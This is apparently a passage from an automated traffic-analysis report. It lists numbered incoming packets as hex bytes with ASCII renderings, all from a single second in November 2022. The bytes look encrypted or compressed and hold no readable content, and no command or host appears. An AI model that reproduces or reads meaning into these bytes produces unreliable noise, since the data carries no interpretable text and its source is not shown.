2022-11-03 06:22:07 UTC	133	IN	Data Raw: 87 bb bd 37 17 1b 19 43 8e d8 6e 84 b2 12 50 b7 0d 2d 2a 4a 29 8b 82 b0 83 58 ca bf 40 69 d6 99 63 72 6d 26 df dd e7 a0 24 78 25 b7 7e 6c 33 3d 79 dd 16 cd 15 60 00 ef eb 8d 5c e7 28 6c 57 0b 17 9e a8 df 0a 0d 4d 3e af f2 57 7d 36 bf 9d ca a5 94 80 4a 4c 72 2f f1 50 73 7c dc 57 d7 b4 dd f9 a2 e4 bd 83 79 ee 0b 6f 61 63 02 2d 94 7f 5f 23 b4 46 1a 72 39 8c 86 3d b3 8f 10 2e 9a 17 38 4c f4 94 3f d6 70 bb a0 ce 18 30 25 a6 d1 b3 ff 1d 80 bf c1 15 82 06 08 31 3c 33 2c 9f 08 8b 22 68 2e 9f f9 c2 a3 07 67 82 f1 ae db 0c 10 03 23 80 b7 a2 0f 1b 37 b3 cf 0c dd be d3 49 8f 66 ae b4 e9 f0 2e 51 4e 0b a8 ea eb c2 cd a1 95 fe c0 6a d7 b3 51 5a 0b e7 27 e7 00 d3 fe 44 f6 55 98 50 9b ac 69 7b ad 87 42 64 a6 82 84 61 9c 97 16 3b d6 98 da 4b a4 29 f6 09 70 f5 bb c2 64 7f Data Ascii: 7CnP-*J)X@icrm&$x%~l3=y`\(lWM>W}6JLr/Ps\|Wyoac-_#Fr9=.8L?p0%1<3,"h.g#7If.QNjQZ'DUPi{Bda;K)pd
2022-11-03 06:22:07 UTC	134	IN	Data Raw: d7 0d a7 db b4 09 57 63 24 8f 28 bd 6d bb 58 b8 e5 83 6f e4 10 f8 1a a1 ae b9 60 51 33 0a 63 69 14 a2 99 39 d2 8e 9f 06 dc 24 a1 04 ce 10 92 7c 86 07 ee 92 45 62 6e bc b9 cc 6c 8e d9 d8 a4 f1 ce bc 29 93 93 28 4c c4 39 54 97 fb b9 bc 19 8e b0 10 6b 35 c5 2b fd eb a9 37 16 1c 3c 72 d4 62 99 fb 84 c3 e7 67 d7 f0 86 db 5f af ce 6e bb f5 c0 ee 4f a6 2e 4b ec 07 a1 88 14 fc 07 36 42 0d 45 ab 89 30 31 19 aa 5c 4a a0 7a dc c8 4c b8 0a 75 fa 85 7a 77 2e cc 65 05 e7 79 84 f2 cb 06 2b dd 53 4d 11 cf c7 c2 64 1a 4c 6e 0a 28 52 6c 29 08 35 14 c2 1b 2f 6b 6f 96 13 49 85 bd 2e 24 e6 c2 45 ab a8 17 60 16 7c cb 9f 4c a7 bf 45 d7 f6 e4 61 fc 4f 0e c7 9d 2d 79 6e c8 66 96 40 a0 fb 59 06 0c 15 52 3a bb e3 e0 33 b1 d4 43 9d f9 91 c6 da 5d 09 7b a4 93 b3 17 3e a5 e7 a5 5c 32 Data Ascii: Wc$(mXo`Q3ci9$\|Ebnl)(L9Tk5+7<rbg_nO.K6BE01\JzLuzw.ey+SMdLn(Rl)5/koI.$E`\|LEaO-ynf@YR:3C]{>\2
2022-11-03 06:22:07 UTC	136	IN	Data Raw: c1 c0 ed 97 a7 8d 67 a3 f0 6b 64 90 29 8e 24 b9 9e e6 62 90 de d9 c4 46 3c 36 99 ae 61 1e 2b f4 21 dc 95 9a 4c f2 bf 4c 95 f2 7d 45 91 dc 60 ad 50 4f f0 a1 7e b3 1f b1 b0 ce a6 42 72 36 48 6c 31 85 c2 de 1d 5e fc 5f aa b1 3a b6 47 0e 76 e2 e2 dd 57 87 c7 c2 a3 a6 ca b8 b4 d9 cb 96 a1 53 d5 b5 61 8a c7 c8 be 11 c8 61 55 b1 2f fe 7b 4e d5 5a 88 a0 75 aa af ca 5c 2d 76 ab a7 de d0 88 c8 a6 5d ce 63 2a 98 cc a2 b1 79 02 5f 29 73 a3 25 fa ae 14 d8 e5 86 ae 0e de bd 99 6e 03 0a 71 ad c5 ef a0 a1 0a 32 77 c0 b7 fe 77 b1 36 be c8 b9 96 c8 68 c2 0c d4 5e 88 76 a7 32 d6 a8 43 9f 57 9f 6e a2 9d 38 82 19 8e fb 66 9f 95 3a 0f c4 0d 3c a8 af 16 2e be cf 57 43 7d fb 25 07 dc 6b 57 9b bb ff bc 81 2f b3 fc 50 16 8d 06 08 12 6e a0 df c0 80 72 d9 ed 0f 66 5e a0 85 5f c6 e2 Data Ascii: gkd)$bF<6a+!LL}E`PO~Br6Hl1^_:GvWSaaU/{NZu\-v]c*y_)s%nq2ww6h^v2CWn8f:<.WC}%kW/Pnrf^_
2022-11-03 06:22:07 UTC	137	IN	Data Raw: a4 72 f0 ea 56 44 ff 82 99 61 52 f2 1c b7 b3 b7 d6 60 b0 0c 1e 64 dd 93 14 3f 5e fe 31 0d 17 56 70 a5 c6 a3 6e a3 8a 96 39 8d 60 42 d7 95 db a9 fd 7c b0 6a 78 64 3c 10 3f 29 67 0b 9e fe 59 68 4f d8 89 6d 2e bb ff f6 a4 a4 0b 50 9e 10 49 ce 6a 94 54 46 8b 78 74 7d d2 ed 97 f1 fc cd b0 ee 7c 07 93 5a 70 33 5d f5 a4 33 e8 eb 35 4b 46 aa 08 4e d8 19 35 1a ba 14 7f 27 dd d1 7c db f9 50 6a a6 63 ba 60 38 b2 ed 25 1e ee a4 0d 20 57 f9 84 23 05 82 ad 87 5e c3 b0 b8 1b ed 3c f0 78 45 d8 9a bb 0e cd 03 70 4a c6 f7 d8 98 c2 6f ca e4 b4 9c ef 97 e0 82 c2 1d cd 01 05 62 c7 ec 15 bd 82 76 fc d2 8c 5e 4c 99 c3 16 a6 35 38 79 e1 ac 93 bd 7a 7d b1 52 45 94 5d 8d d0 ef 5f 36 3c 4b 66 38 1d a5 16 91 c3 2c cd 41 ec ee 43 cc 62 01 fd 02 5f be 84 84 05 08 23 18 e2 29 3d 29 6c Data Ascii: rVDaR`d?^1Vpn9`B\|jxd<?)gYhOm.PIjTFxt}\|Zp3]35KFN5'\|Pjc`8% W#^<xEpJobv^L58yz}RE]_6<Kf8,ACb_#)=)l
2022-11-03 06:22:07 UTC	138	IN	Data Raw: b1 7d 31 3b b5 4f db af 49 4a ec 7c 5a 06 6a 0e 86 12 d8 fd eb b8 b5 2f 0f 09 62 f1 35 12 d1 42 87 67 47 7b 8b e0 da e8 9d 13 65 a4 f0 cb ae d5 8c a6 8b ad 5f 9c 0e 3f ba 7f 2a cb 58 ee 4e 80 18 4f 40 65 99 d7 e1 ff 79 06 a9 e4 73 0e 01 fb f1 47 68 ec 51 68 eb d1 6f 94 d1 82 2b 1e 9e 0c 8a 78 d4 0a 79 6a e6 73 c4 d1 11 67 ae 71 b3 1c 4e c6 3b bd a3 e6 c8 30 dd 71 b2 1d 70 1b 28 30 42 34 99 71 84 7d 35 5c d2 b0 f4 9c 78 49 dc 7c 62 1c 23 25 d0 9f 41 a5 71 51 20 72 7e e0 41 e0 8c 36 a1 bd 73 86 ed ab 88 00 93 af 01 3c 15 54 fe d3 0d 88 ed f7 0e 4e e0 e7 0f c8 e9 a5 c0 29 14 9e ed dc 6e b6 37 ad 9f 44 04 ef da 17 87 68 4c a6 fd 8c 4b a3 c1 76 a9 48 ce 8c 5d 9b 07 b2 02 7c f7 de 66 12 22 17 d6 e4 15 5b 1d dd 68 4f 5d 2f 91 26 34 71 92 46 23 2c 9c 3d 5d 22 1a Data Ascii: }1;OIJ\|Zj/b5BgG{e_?*XNO@eysGhQho+xyjsgqN;0qp(0B4q}5\xI\|b#%AqQ r~A6s<TN)n7DhLKvH]\|f"[hO]/&4qF#,=]"
2022-11-03 06:22:07 UTC	139	IN	Data Raw: dd b2 b5 6d 37 19 7b c9 d5 ba 87 a9 1d 8e 0a cd 28 3d d9 28 0f 05 83 22 58 06 53 3c 02 50 b8 c2 bf 95 16 02 9c 01 2e ba 9c d7 b0 b4 b4 12 d5 8c 55 03 c1 79 76 25 71 3f 90 bb b9 2b df f1 a0 fa af 51 85 38 47 e8 d4 88 e7 ab 39 9c be 86 0d c2 71 b1 8b 9a 70 d2 a8 21 b1 57 35 33 87 dc 94 d0 ad 14 68 1e ab 8f 77 76 59 21 8c 1b cb 7d 05 28 d8 d9 55 99 ca 32 a7 9d 14 71 a4 cd 4d 7e 9d 5f 70 4f 9e 35 67 68 62 99 40 73 9e 09 95 09 5f 94 68 16 83 48 f0 fd c4 6a ce 90 fd 53 74 2c c2 8e 85 ed e3 17 fe 25 24 bb 25 1e d3 13 e4 cf 1c 38 b8 a7 aa 50 4f 48 ae 04 ee 27 b4 f0 23 0d d1 d5 95 fa 33 f7 21 39 ef 50 d3 cb f4 72 34 68 8f 3c 95 ed b9 0d 4a 96 6b a0 b5 40 34 af c0 8f 82 17 86 3e 68 ff e2 9b e5 18 dc d8 26 a2 d2 45 24 57 4c 1e b8 1b 88 3b 16 7f cf 67 e8 03 4e 23 0f Data Ascii: m7{(=("XS<P.Uyv%q?+Q8G9qp!W53hwvY!}(U2qM~_pO5ghb@s_hHjSt,%$%8POH'#3!9Pr4h<Jk@4>h&E$WL;gN#
2022-11-03 06:22:07 UTC	140	IN	Data Raw: fb 98 a9 a6 6a a0 a7 47 2f 5f 4a 98 df 76 86 45 d1 e6 bc 2b 32 e1 6b e2 e2 f0 c7 93 d5 10 6e ee af 42 e4 04 3b e2 1b 76 85 87 24 e6 59 e3 f3 aa 9f 6b e2 01 30 6b ac fc 6d d5 be 7d c1 65 24 74 56 cb 57 9f 35 71 21 02 c6 ae 36 9b 7c aa 0a 72 4e c1 db 04 57 c2 4e 14 42 c5 17 dd d9 66 f0 81 0b 02 0b 2f d6 f6 8b df db 97 f6 ee 46 a3 c3 dd 0a d8 80 32 80 c7 11 82 c1 f1 46 16 ee 23 61 4c 61 99 67 9c 73 06 ae 9a 20 f8 90 fe 8d 32 95 70 6d 26 47 0d 56 e2 15 c5 be 13 eb f8 24 2f dd 6f 02 9f bc b0 63 80 7c da f2 63 7f 06 97 e8 3a 1a cb ee 84 35 d6 6b a8 00 af fe 4b 5a e8 c2 3c 73 12 98 ea 24 d1 14 82 b5 f5 7d f1 b3 ee 0d bf 5d 55 97 d2 c2 af b8 f8 15 7d 12 28 41 03 07 9e 81 31 72 20 f4 e0 b8 13 2d 5f 61 8d dd d9 ea 17 de 67 32 60 81 f3 07 55 6a 28 80 6e 87 45 59 a9 Data Ascii: jG/_JvE+2knB;v$Yk0km}e$tVW5q!6\|rNWNBf/F2F#aLags 2pm&GV$/oc\|c:5kKZ<s$}]U}(A1r -_ag2`Uj(nEY
2022-11-03 06:22:07 UTC	142	IN	Data Raw: 6b bb 30 fb 45 db fd a7 11 df 2f 5c 56 80 0f 8b 52 9f df 31 6a 41 45 16 3d 5a 9d 9c 40 e1 a9 fd 59 93 4a e8 a6 8e 66 8d 58 bb f1 57 91 cc f5 9a fe 5f 3f 16 e8 b8 1d 7b 6a db 1f 2a cd c0 96 f6 16 fd cc a0 d4 7c a5 06 ca ec d5 3f 16 32 c5 e5 39 b6 93 87 c0 71 0c a1 6e e9 02 13 9c e6 42 b2 50 15 a9 aa b7 ff ff 4c a2 39 9e 43 ad 98 02 e9 06 ec 01 50 04 05 2b 75 9e 80 7f 5b 1a 3e 6d 66 ee ff 87 96 78 77 f3 cd 36 81 91 89 05 04 a2 ae 3b c5 d6 58 34 25 89 6e 76 9a ee c0 05 b7 04 e6 28 65 81 cd d3 eb ef 3d ad 6f 6e 08 61 f4 b1 4c b9 98 df d4 96 3c 9e 00 62 6c a0 25 df 9c 4e 64 b0 d1 0d 15 2c c1 34 ae 6c 8c 72 1f 0f 32 1d 91 d2 69 09 a9 7e 22 ed 91 69 42 c9 c4 17 7f 66 fb 96 f9 7c 49 57 0e 09 48 91 bd b0 fc f5 81 6c f2 df 1b 47 a7 2a 60 20 e2 a0 c6 23 1b f7 5b af Data Ascii: k0E/\VR1jAE=Z@YJfXW_?{j\|?29qnBPL9CP+u[>mfxw6;X4%nv(e=onaL<bl%Nd,4lr2i~"iBf\|IWHlG` #[
2022-11-03 06:22:07 UTC	143	IN	Data Raw: c0 cf 08 5d 36 9f 9e fb 24 4c 60 d1 b7 c3 da ea 1a af 8f cb a6 80 f0 73 b2 88 8f 9b a0 6d ef fb 73 74 48 e9 a5 e0 a3 12 ad c9 36 f2 63 ee 43 c1 bd 4b 43 11 d6 d2 14 6d 50 77 da ee 1c 84 d0 be c5 8d 96 f8 7a 08 3a 40 7b b4 82 cd d0 e9 db c9 1a ac 7c 54 e6 09 52 ca 07 5d 72 1c 6d c1 1a e2 43 c0 e5 2d fb a9 57 a3 18 b0 5b 93 b2 71 c3 13 5a 4f d4 d9 15 5b 98 a7 a9 10 b7 25 4b 10 84 94 43 bb 86 4f 9d b0 f0 83 cf dc d6 89 ac 59 da 8f 54 9d 8c 49 26 11 9b 88 58 7b f2 ed fc 31 01 1f bf 58 e3 42 f8 32 04 e9 00 7f dc 69 08 c9 6e f0 9b 05 66 1b f0 40 6a 01 4a 3a f6 59 e8 87 10 82 bc 30 65 39 c0 15 c5 6f 99 36 6a 15 9d 72 f1 a0 8e 47 7f 0e 4b 3d 91 e7 b9 75 74 45 c4 17 98 a2 ca 6e 23 b9 91 13 39 1f 16 b4 d4 5b 7f 95 ba 1b eb fa 7d ee 6e c7 e1 26 e7 ac 94 87 38 16 70 Data Ascii: ]6$L`smstH6cCKCmPwz:@{\|TR]rmC-W[qZO[%KCOYTI&X{1XB2inf@jJ:Y0e9o6jrGK=utEn#9[}n&8p
2022-11-03 06:22:07 UTC	144	IN	Data Raw: 3c 69 d2 23 34 d4 ab f8 64 09 fa 48 50 85 b5 ba df c8 d4 5e a2 42 2e 90 9c b5 e2 30 7c b2 22 13 3c 20 fe 42 0b 09 7c 28 b4 e2 7d 80 b4 6b a6 af 66 33 e0 a4 e8 c5 7d 5b d1 40 2b c2 cd bf 92 ad cb 43 3a 8b 41 1f fa cc 06 29 17 bc 7f 44 49 78 b0 88 a8 52 a7 ce a7 33 0d 25 40 f7 c1 96 3a d8 59 26 d5 b2 74 70 c0 b4 36 8e 5e 07 21 eb f0 07 8e 4a ca c4 fd e8 3d ea 20 3f 8d 7f d2 17 d8 34 54 5a f5 8e 65 ac e9 80 ec a6 ec aa 9d a1 e9 3e a5 22 83 e6 17 d8 cf 57 f2 80 5d 32 70 18 22 44 a7 95 b5 a0 e5 f3 d9 58 e3 89 7d 4e 2f 39 f4 5f a8 fb 3e 2e af 8b f7 e0 4c db 1e 32 44 28 f6 32 03 f1 8b a4 db c6 0f dc bd b0 ef f0 42 d0 78 8c b0 47 cf f7 1e ce 4b 35 f1 62 37 65 39 83 dd 9f 50 2c 82 1b ec b4 b1 76 a1 ee 7a 7f b1 79 5a bc 06 4e 59 5a d5 06 2e 6e 21 26 fa 48 44 22 86 Data Ascii: <i#4dHP^B.0\|"< B\|(}kf3}[@+C:A)DIxR3%@:Y&tp6^!J= ?4TZe>"W]2p"DX}N/9_>.L2D(2BxGK5b7e9P,vzyZNYZ.n!&HD"
2022-11-03 06:22:07 UTC	145	IN	Data Raw: e6 d4 da 35 77 2a cb 36 5e a8 2e 46 5e 96 90 7d 02 0d 7e c7 b4 32 ff 07 73 dd 4d 64 6e f2 e2 e8 0b 3d d9 4c c8 6b 4c 1d ca 1e bd 89 d5 a6 31 b4 c0 a3 8d f2 70 eb 61 24 47 a5 e3 73 79 c8 0f 63 45 0a 1b a3 65 88 74 dc 6a 20 c9 9f 1b 6c 32 d8 cc 2f 27 4b 3c 53 ba bc 8f 3e 10 76 e0 12 55 d7 09 3d 47 0b 5e 3d 3f 54 2f 72 ae 1f Data Ascii: 5w*6^.F^}~2sMdn=LkL1pa$GsycEetj l2/'K<S>vU=G^=?T/r
2022-11-03 06:22:07 UTC	145	IN	Data Raw: 28 01 03 e6 74 70 00 46 f3 45 52 73 cf 73 10 c9 0a 28 f4 e9 15 a9 01 43 56 77 c6 65 9c 6e 21 40 15 ba 0a 1f ca f8 a8 6b ab 5b 25 47 0c 33 e3 81 a0 36 5b 75 fe 51 3e 25 53 46 15 91 cf 4a 89 03 10 95 66 5b bf 0f 22 fa 35 95 7a a7 33 9f fd 9d 42 05 a5 de e6 46 80 db 8a 5f 26 b3 40 16 3e 61 7f 4e 89 8b 4e 05 27 e8 e6 f5 2f 31 3d 82 4b 29 1c 53 40 48 4e 2a 32 06 b7 e0 f9 0d 9b 9f 15 4c 34 90 56 97 70 89 39 e7 04 fd d7 bf 17 9e 82 10 2d ff 14 14 c6 c1 c5 92 67 2c fc 68 76 e2 10 9f a5 11 ab bf 12 d9 b1 a0 26 75 e3 bb 79 8e 3f 0b ba b7 91 4f d1 fc fc 9d 34 26 36 cc c2 a8 02 de 0a 11 41 70 d4 f4 09 bb 3f 6c 87 d1 bb 68 80 01 11 bd c5 5d a8 1f 8d a2 14 9a 49 9e f9 57 39 ad 21 9f 7f 2a 2f a2 3b b2 60 87 64 47 45 62 4c 9f fb c3 4f ec 4c ca 3e 39 ce 03 c8 da 1e 11 9d Data Ascii: (tpFERss(CVwen!@k[%G36[uQ>%SFJf["5z3BF_&@>aNN'/1=K)S@HN2L4Vp9-g,hv&uy?O4&6Ap?lh]IW9!/;`dGEbLOL>9
2022-11-03 06:22:07 UTC	147	IN	Data Raw: e8 33 81 eb e7 c9 91 1f 2c d8 27 88 2c dc 3e 3b f1 f7 45 df 6f 1a ab 27 96 7d d1 f2 e3 d4 27 54 44 92 1f c3 f9 5f a4 0e d2 42 c1 f0 78 17 10 3f c9 6e a3 ca 25 c6 1d 22 ad 3a 00 05 c6 e4 41 d1 33 88 41 50 0a 3e f9 d9 c8 b9 4f c3 2e c9 a2 b5 35 ca 14 13 f4 ee 55 f2 fa 58 83 33 ea 42 41 c1 32 cf 15 b6 b5 af f3 8b dd 0d 16 11 99 5f df 21 b5 58 81 ad 75 4b b0 63 2e 47 ba ab a8 9c fd f2 fb f8 6c 64 74 b3 eb 58 31 71 35 58 d2 c8 49 51 d3 0f 31 cf b5 48 a2 9f 0f 15 63 c0 1d 04 8b d2 ed 4c eb ca 45 d2 9a e7 5c 8d 35 f1 40 ea 83 88 5e e7 98 10 17 c4 df b1 d9 d2 51 4e 0d 36 f2 19 8f e3 56 6e e4 3c de 2e e2 ed 66 d4 ef b7 e5 49 74 b7 d3 50 77 4e 22 f2 e4 15 62 78 6d 5e b7 00 cf 8f 91 3b aa e5 25 39 06 a5 79 4e 91 ad f0 90 a3 e5 a3 02 ce 9b db b6 66 94 1c cb 6b 95 23 Data Ascii: 3,',>;Eo'}'TD_Bx?n%":A3AP>O.5UX3BA2_!XuKc.GldtX1q5XIQ1HcLE\5@^QN6Vn<.fItPwN"bxm^;%9yNfk#
2022-11-03 06:22:07 UTC	148	IN	Data Raw: 23 8f db 51 c6 5a 2c 5e 99 4a 33 cd 77 da 2f d3 f3 05 ec 1f 90 09 19 2a 8b fd 16 d3 99 13 8c 77 0e 08 a3 13 a9 87 b0 05 4f 3f c7 23 8f 0d aa 04 4f 7b a1 f0 9a d6 82 d5 a5 be 94 7b 02 fd 40 91 f5 8d cc 7a 68 ba 52 1e 3b 36 a4 ee bd a5 06 f5 b8 cc fc dc b3 a1 b2 8a a3 9b c3 40 12 d0 8a 49 f1 b3 1c a3 c4 a5 1c 15 34 63 b8 c4 ac 4b 1b c0 bb 58 08 c6 a4 5a fd 0f 08 c4 21 d3 8a 3a f4 6f ea 5b f5 69 71 e5 27 46 1e a6 a3 69 0a e4 45 44 60 b3 75 a9 4d a9 70 cb 57 f6 70 bd ea aa 3c 93 44 76 33 b7 d4 e7 e1 51 d5 15 13 74 c1 b8 f6 cd 05 c1 12 06 76 b5 bb ea 15 b2 a1 b0 c9 07 c8 05 e6 20 97 cb ce 0d 5f 3f d1 ae 26 6d 6f 10 31 4b 84 11 7d b2 37 a0 33 9e 14 61 99 2d 76 b2 ad a6 8c 2b 46 7b be f9 b0 98 48 bc cf e7 a5 99 34 f2 69 a9 a5 4b 80 1f 3f 7c db d5 67 0e 4b 7a ba Data Ascii: #QZ,^J3w/*wO?#O{{@zhR;6@I4cKXZ!:o[iq'FiED`uMpWp<Dv3Qtv _?&mo1K}73a-v+F{H4iK?\|gKz
2022-11-03 06:22:07 UTC	149	IN	Data Raw: a0 66 60 5f f6 3a 48 8e c0 3a 97 5c 30 b3 53 9a 97 08 9b 53 16 82 62 8a 46 0d bc 0f b8 99 db 31 b2 31 d7 f6 7a f4 8d 75 af 69 72 56 c0 d3 cc 05 b7 d9 a7 ff 38 45 31 0e fd 66 31 5c db 67 f9 42 44 c3 42 84 21 df 6f 41 a4 61 67 bf f0 1a 46 93 3c 2c c5 30 d8 d8 be be e3 30 49 90 55 e7 c1 82 c5 57 5a 2d e1 63 a1 8f 89 6b da 1c 8d fb 38 9a 16 d4 53 b6 36 1a 1a c0 bd 46 b0 00 d7 77 c7 fc f1 0d 60 a5 c4 94 32 43 92 f1 34 02 51 fb 90 bf 63 69 d3 fa c8 30 22 52 0f cc c3 41 27 a2 c9 09 88 a1 63 20 2e 09 d3 d1 d4 c0 ec 29 95 a2 c9 fe 72 41 1e 72 5c 81 07 32 20 78 35 5b 77 32 f3 99 c0 1c 50 32 bb 9b 11 09 2b d6 8e 28 07 8e 58 b9 95 06 f3 ac 14 ed 91 d3 8a 20 28 ce 3d b5 d9 54 0a 32 2c cf 97 cf d8 ad 17 42 24 4b 4b d6 c3 7c fe 24 df fd 67 ab 68 52 43 da 95 f5 0d 3e 15 Data Ascii: f`_:H:\0SSbF11zuirV8E1f1\gBDB!oAagF<,00IUWZ-ck8S6Fw`2C4Qci0"RA'c .)rAr\2 x5[w2P2+(X (=T2,B$KK\|$ghRC>
2022-11-03 06:22:07 UTC	150	IN	Data Raw: 66 4c d6 bd dc 0d f9 61 00 27 30 d4 8f 67 df 11 4e ca e8 5b 57 86 0e 26 ec e2 d7 91 3e d6 d5 46 ec f4 c8 63 8a 42 b1 70 8b a5 47 7f 47 f5 17 af 8a 2c dd 37 6b 74 cb 0f 43 9d 2d 8e 05 4e a2 fd 87 29 27 66 1b 62 f6 83 b5 18 25 de ad 23 e8 a9 3b de 86 ad 7e c1 d0 c0 72 12 e4 bc bf bc d4 d7 1b e3 89 ee b7 4f 89 b3 89 a5 c3 c2 b6 45 9f 0f 3e e4 5a e7 d0 e2 2c 7d ee 24 2b 13 62 6b 02 5a a6 a6 1d 6b fe 1a af ad 16 7c f0 ce 76 b0 fc 42 61 54 2e 90 34 b9 2e 0f 74 91 30 7a 44 f7 fa d7 11 04 8c c7 a3 b9 f6 a0 9d ad 77 07 ff 9c 72 29 cd 90 e0 03 59 b5 5a b2 80 03 45 57 15 f8 b2 95 a4 84 6f e7 6a 41 27 90 88 44 85 05 02 c0 f9 43 a0 27 c1 2d 93 80 80 73 9d 7d 80 77 86 2e 44 4a f3 cf ae ca f3 d8 0e 2a b4 d2 4d fd 3d 5c 53 1d 05 b0 0c 7a 4f b6 33 e2 61 1b bb f7 9c 1b 26 Data Ascii: fLa'0gN[W&>FcBpGG,7ktC-N)'fb%#;~rOE>Z,}$+bkZk\|vBaT.4.t0zDwr)YZEWojA'DC'-s}w.DJ*M=\SzO3a&
2022-11-03 06:22:07 UTC	152	IN	Data Raw: b9 18 e5 59 b0 9f 91 2d 15 9e fa 92 51 5d 3b 29 30 e7 47 cf 46 98 53 c9 d5 20 30 6c 58 e4 bd 3e 66 b4 58 4c e6 0e 8c bc 0c 58 de b2 67 ba 06 c2 ef b2 6f 0f 6a 06 15 05 a8 25 a8 7c 8f d4 60 11 66 b7 dd 24 71 19 8a b1 22 66 41 fe cb b9 ca 73 73 f3 45 4a 67 51 f9 6a 05 f3 52 37 d5 2a 51 20 3a 83 4a 50 78 38 87 37 8a 09 7e ee ce 4b 62 80 1a e7 c3 cb 79 83 b7 cf 3d c4 8d 58 7d 04 08 a3 42 c4 3a e7 b3 97 f6 d5 88 b0 4a 3a db 47 64 42 c0 a6 75 ae f3 d5 da 78 26 0b 1b 90 80 a4 dc f7 61 fb a3 37 fd 31 88 71 68 bb f5 6e 54 bb 7a 50 69 fd df 21 c6 da 84 2f 1f 3b 96 a5 d4 fc a4 75 5b 69 85 24 8f af 63 9e 05 70 44 5d 5f b3 58 3c 9c 0d 73 0c 4f 07 45 ef de 26 90 3e dc 4c 89 c1 3c b5 3e a9 a8 a8 c1 c3 8b ba 1a 43 56 35 42 1c cf ca aa b7 c1 ba b3 5f 48 9d 1c cb fc 96 33 Data Ascii: Y-Q];)0GFS 0lX>fXLXgoj%\|`f$q"fAssEJgQjR7*Q :JPx87~Kby=X}B:J:GdBux&a71qhnTzPi!/;u[i$cpD]_X<sOE&>L<>CV5B_H3
2022-11-03 06:22:07 UTC	153	IN	Data Raw: 5d a1 cb 3f dc 95 4b 92 2a 7e 0e 68 be 97 fe c8 23 ae c0 e1 e3 c7 31 bb db af bb 5c 35 59 1c b9 47 16 65 9b df 0f 7a 53 85 c4 84 56 62 bd 14 ff e2 bf be d6 26 77 ee 3d 35 58 12 f9 b7 cf df 63 fa ad 2a b0 ba fb e8 eb 07 95 54 e9 5e 2a ce 30 75 64 1d aa fc d7 aa ec 56 e9 49 f6 6f fa ec 06 66 aa 77 b8 a7 7d 3b 4b 90 ee de ca f3 31 f6 02 c2 eb f5 97 e1 df 88 0a d5 fa ae 4e 2e 63 0a 6f 9c 90 67 c0 a2 99 a6 26 d0 2e b1 5f c2 4b a1 42 8a 12 fd 75 e7 a7 7f 71 9c 10 2d 5d fd 07 c3 5e 5f 48 c7 f8 a3 10 46 e6 f3 77 63 64 c2 e7 a6 db e8 22 c8 c7 df 00 1d 3d 91 b5 bf 9a 42 fb a7 9e c3 f9 77 b4 e1 fa b9 b9 64 1a 56 17 e8 a9 13 7b 3d 23 53 b2 6a 06 15 1c c7 d2 3b c6 b3 44 e3 5f b0 8c 07 7f 9c 1b 2f 62 5b 01 eb 93 67 c8 0c 82 6f dd d9 90 b2 ab 4d 7d f5 ee 37 00 53 30 e8 Data Ascii: ]?K~h#1\5YGezSVb&w=5XcT^*0udVIofw};K1N.cog&._KBuq-]^_HFwcd"=BwdV{=#Sj;D_/b[goM}7S0
2022-11-03 06:22:07 UTC	154	IN	Data Raw: a7 f7 b0 e7 32 ea 26 5e 99 0c 58 de 23 53 a1 d3 3a 82 e2 9c 7f 61 a1 5f 13 ab 59 68 86 d6 db bd 10 c4 6a 5b b0 90 5c b6 76 2f 5d fc 93 37 39 f8 31 7e 06 0d 42 b9 c7 2b e3 e8 ca 49 56 58 be c4 62 23 db d1 a1 cf f9 a3 19 75 07 dc 79 45 07 74 e0 7a 37 68 e1 a7 25 93 e3 d3 78 b4 3a c5 56 3d 83 fc 5f 19 4a ff 28 47 ed 43 f5 42 a0 c6 1e 69 a5 ad 28 18 18 a2 a5 f8 22 7e 33 db b8 4b 74 04 15 33 44 bf 39 a8 9f 1f 22 a4 62 46 ee e2 bf 84 99 2a d3 fa 3c 89 d4 25 8d ab 9f 33 36 0d 53 11 a7 40 39 e9 53 e7 23 00 c8 a6 06 b6 ac da b2 c9 04 44 9d d8 e6 49 1f 61 b9 65 61 f8 49 5d b1 72 ad ba 08 77 23 f6 40 55 08 0d 47 3f 2e 7c 48 fe 58 1d e3 1d a6 09 c2 eb c9 14 de 65 e7 6d 59 0b 1b ae c0 5b ab eb d2 76 7f 6b f6 11 0c dd 1a 20 21 60 98 f8 b5 b2 0c 19 8c 8d 89 85 7b e2 91 Data Ascii: 2&^X#S:a_Yhj[\v/]791~B+IVXb#uyEtz7h%x:V=_J(GCBi("~3Kt3D9"bF*<%36S@9S#DIaeaI]rw#@UG?.\|HXemY[vk !`{
2022-11-03 06:22:07 UTC	155	IN	Data Raw: b9 62 a8 01 13 48 6d 29 40 a0 d3 a2 78 c8 60 10 1c 10 bc 65 04 7d de e5 2a bf 6b f5 ad a1 8a 49 0e d1 28 bb b4 3e f1 7f e9 68 16 06 55 5e b6 0a 1e 54 d3 dc 25 3a 85 16 32 99 2a f9 f6 81 b3 21 7d 5c 80 46 64 e0 17 a4 46 ec 17 f3 6f c3 3a ee 28 65 29 18 7d 55 7e 96 0b 0c 1f 7f 4f ec 7a 0f 36 3b 79 8a b9 59 10 da 2e 05 75 ac 88 bb 56 0d a0 29 2c f2 3f 87 7b e4 78 c2 72 41 e0 1e 0c 43 db 87 91 95 92 a3 67 f0 5b a0 0f 80 a3 c6 c7 d6 97 5d 20 8b 74 e4 9c 07 75 9a 04 fa ad 35 43 15 ac fe 3b e0 70 df 8b 2b 70 27 99 95 49 0b dd 9d f2 a2 85 a2 a9 4b 31 24 37 c0 95 86 7c 34 c0 5f 8f 8b 34 31 e9 f4 ab 58 54 97 19 fa af 32 c6 a4 e7 09 ce 95 e2 c6 f7 ee c8 b8 62 7e 1e c5 20 d8 47 de 46 98 60 2d a4 1f 5f d8 f3 92 1d 3b dd 71 bc 83 28 8a 27 c9 48 fa ff ee c8 5a d4 57 ee Data Ascii: bHm)@x`e}kI(>hU^T%:2!}\FdFo:(e)}U~Oz6;yY.uV),?{xrACg[] tu5C;p+p'IK1$7\|4_41XT2b~ GF`-_;q('HZW
